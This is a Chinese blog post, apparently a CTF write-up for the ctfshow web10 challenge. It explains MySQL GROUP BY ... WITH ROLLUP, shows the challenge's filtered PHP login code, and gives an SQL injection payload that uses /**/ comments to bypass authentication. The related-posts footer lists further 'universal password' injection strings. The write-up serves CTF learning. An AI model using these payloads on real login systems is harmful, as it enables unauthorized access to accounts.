2021-11-13

最新推荐文章于 2022-12-30 11:46:46 发布
最新推荐文章于 2022-12-30 11:46:46 发布
阅读量2.7k 收藏
点赞数
分类专栏: 每周学习 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51553814/article/details/121308168
版权

做ctfshow web10,感觉挺有意思的,记录下来

特殊的语法

在讲做题之前,先说一下mysql的几个特殊的语法
首先这是我们的users表
在这里插入图片描述

group by

group by的作用就是将打印出来的表排序
例如:
在这里插入图片描述
最后输出一个排序后的结果,我添加了一个count(*)计数使其看的更明显
当然也可以去掉count(*)

在这里插入图片描述

with rollup

with rollup的作用就是在group by 排序的基础上再加一行,用来统计所有的数目
在这里插入图片描述
把count(*)去掉就是
在这里插入图片描述
可以看到password的列表凭空多出了一个NULL值,利用这个NULL就可以开始我的骚姿势的

做题过程


下面是源码,


<?php
		$flag="";
        function replaceSpecialChar($strParam){
             $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
             return preg_replace($regex,"",$strParam);
        }
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
		if(strlen($username)!=strlen(replaceSpecialChar($username))){
			die("sql inject error");
		}
		if(strlen($password)!=strlen(replaceSpecialChar($password))){
			die("sql inject error");
		}
		$sql="select * from user where username = '$username'";
		$result=mysqli_query($con,$sql);
			if(mysqli_num_rows($result)>0){
					while($row=mysqli_fetch_assoc($result)){
						if($password==$row['password']){
							echo "登陆成功<br>";
							echo $flag;
						}

					 }
			}
    ?>

利用replaceSpecialChar函数过滤掉了大多数的关键词,
mysqli_num_rows是算返回的结果有多少行
mysqli_fetch_assoc是将返回的结果以数组的形式输出,也就是$row最后代表的是整个password的表

下面是前端界面

在这里插入图片描述
结合一开始讲的语法,我们只需要像下面这样构造payload

username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup
password=

我们在登录框输入username后,在password这一框选择不输入,也就是输入为空,那么当后端匹配password时总会匹配到这个NULL值

在这里/**/用来防止空格过滤,1=1是在测试的时候发现没有admin这个字段,那么我们只需要1=1让它语句成立,也就是最后的后端连接sql语句为

select * from user group by password whith rollup

最终也就得到了flag

火火火与霍霍
关注
专栏目录
WEB刷题第一天
m0_46336530的博客
05-06 1317
今天刷了第一道简单题 学到了万能密码 admin' or '1'='1 用户名和密码均输入万能密码: buuoj.cn/check.php?username=admin' or '1'='1&password=admin' or '1'='1 html5判断用输入密码,CTF中Web密码绕过(特殊的万能密码绕过)详解_kpbs的博客-CSDN博客可能做过CTF题的朋友们,都有一定的了解过Web登陆密码绕过这种类型的题目,绕过的方法也有很多,层次不穷,今天帮朋友的时候也遇...
USB_Composite-2021-11-13.zip
11-13
总的来说,"USB_Composite-2021-11-13.zip"的内容涵盖了STM32作为USB复合设备的实现,包括虚拟串口和HID功能,这对于开发基于STM32的自定义USB设备具有很高的实用价值。通过深入研究和理解这些资料,开发者可以创建...
php过滤替换特殊字符 函数
炉火纯青
07-17 9630
function ReplaceSpecialChar($C_char){//过滤特殊字符 $C_char=HTMLSpecialChars($C_char); //将特殊字元转成 HTML 格式 $C_char=str_replace(",",",",$C_char); //替换英文逗号, $C_char=str_replace("<","《",$C_char); //替换英文
MySQL REPLACE字符串函数简介
weixin_49496875的博客
12-30 3014
MySQL REPLACE字符串函数简介
Java对SQL模糊匹配查询通配符%和_的处理
qq_36599564的博客
11-07 2987
某位小伙伴,就称为小明,小明写爬虫程序喜欢将搜索框参数直接输入一个“%”,于是就可以爬取到所有结果,这样的小技巧其实是有理有据的。 我们都知道SQL的模糊匹配查询like,比如select * from table where field like ‘%%’;将查询出所有结果,那么如何防止发生这种bug呢? 我能想到两种方法,转义通配符或者替换通配符 转义通配符 可以使用EscapeUtils中的...
sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
wjwqp的专栏
03-01 1万+
admin 'or '1'='1'# (# 为注释后面内容) admin'-- admin'or4=4-- admin'or'1'='1'-- admin888 "or"a"="a admin'or2=2# a'having1=1# a'having1=1-- admin'or'2'='2 ')or('a'='a or4=4-- c a'or'4=4-- "or...
tampermonkey-backup-chrome-2021-11-27T13-18-01-624Z.zip
11-27
下载后通过Tampermonkey直接导入即可使用。
2021-11-11 13-07-49.mp4
03-25
2021-11-11 13-07-49.mp4
lu分解的matlab源代码-ENM502-2021-hw2:ENM502-2021-HW2
05-23
2021-02-21 分配2 LU分解 介绍 在本作业中,我们将在Matlab中实现LU分解。 基本上,下-上( LU )分解或因式分解因子a是下和上三角矩阵的乘积。 运算次数约为O(n^3) ,其中n是分解矩阵的一维。 $$ A = LU $$,看起来...
2021-11-09 13-38-20.mp4
03-25
2021-11-09 13-38-20.mp4
php过滤特殊字符的方法
laxexue的博客
10-11 942
php过滤特殊字符的方法 function replaceSpecialChar($strParam){ $regex = "/\/|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\{|\}|\:|\<|\>|\?|\[|\]|\,|\.|\/|\;|\'|\`|\-|\=|\\\|\|/"; return preg_replace($regex,"",$strParam); } $str = "abcde~!@#$%^&*()...
PHP过滤所有特殊字符的函数
gdali的专栏
12-07 1万+
在中文用户名时用到。 function replace_specialChar($strParam){ $regex = "/\/|\~|\,|\。|\!|\?|\“|\”|\【|\】|\『|\』|\:|\;|\《|\》|\’|\‘|\·|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\{|\}|\:|\|\?|\[|\]|\,|\.|\/|\;|\'|\`|\
正则过滤特殊字符(php、js)
猴子年华的专栏
02-02 1944
详解:http://www.yaoyao11.com/blog/article/details/id/20.html php : function replaceSpecialChar($strParam){ $regex = "/\/|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\{|\}|\:|\<|\>|\?|\[|\]...
PHP使用正则表达式过滤特殊的字符和空白
路漫漫其修远兮
02-08 6313
问题描述     PHP使用正则表达式过滤特殊的字符 function replaceSpecialChar($strParam){ $regex = "/\/|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\(|\)|\_|\+|\{|\}|\:|\|\?|\[|\]|\,|\.|\/|\;|\'|\`|\-|\=|\\\|\|/"; retur
php中去除特殊符号
热门推荐
super0704的博客
11-12 1万+
在php中,对于一些特殊符号,我们需要去除。 我们有三个函数,分别是’trim’, ’ ltrim’, ‘rtrim’. 首先看一下trim的实际用法 trim 去掉首尾符号 string trim(string $str[,string $charlist]) $str=&amp;quot;happy\n&amp;quot;;//此时必须用双引号 var_dump(trim($str)); 常用特殊符号有 \t,\n,\r,\...
替换指定位置字符为特殊符号
angle_0318的博客
10-24 515
/// <summary> /// 将传入的字符串中间部分字符替换成特殊字符 /// </summary> /// <param name="value">需要替换的字符串</param> /// <param name="sta...
PHP 正则表达式过滤特殊字符和空格
lcw2007101的专栏
06-16 1865
PHP 正则表达式过滤特殊字符和空格
微信小程序-加载html代码并替换html转义符
大心的博客
04-15 2047
最近改小程序bug,需要加载html代码,并且后台返回的html代码里有转义符(类似" <),身为一个安卓程序员,改小程序很是头疼,改了将近2个小时,终于是修改好了(不容易呀,还是安卓舒服)。以下是修改之后的效果图: 先进行转义,以下代码 replaceSpecialChar (str) { str = str.replace(/&amp;quot;/g, '"'); ...
.var amout = { '2021-10-01': 0, '2021-10-02': 0, '2021-10-03': 0, '2021-10-04': 0, '2021-10-05': 0, '2021-10-06': 0, '2021-10-07': 0, '2021-10-08': 2.2, '2021-10-09': 2.5, '2021-10-10': 0, '2021-10-11': 0, '2021-10-12': 0, '2021-10-13': 0, '2021-10-14': 0, '2021-10-15': 0, '2021-10-16': 0, '2021-10-17': 0 }; 将对象转换为 var arr = [ { '2021-10-01': 0 }, { '2021-10-02': 0 }, { '2021-10-03': 0 }, { '2021-10-04': 0 }, { '2021-10-05': 0 }, { '2021-10-06': 0 }, { '2021-10-07': 0 }, { '2021-10-08': 2.2 }, { '2021-10-09': 2.5 }, { '2021-10-10': 0 }, { '2021-10-11': 0 }, { '2021-10-12': 0 }, { '2021-10-13': 0 }, { '2021-10-14': 0 }, { '2021-10-15': 0 }, { '2021-10-16': 0 }, { '2021-10-17': 0 } ]
最新发布
03-14
我可以回答这个问题。您可以使用 Object.entries() 方法将对象转换为数组,然后使用 Array.map() 方法将每个键值对转换为一个对象。以下是代码示例: ``` var arr = Object.entries(amout).map(([key, value]) => ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值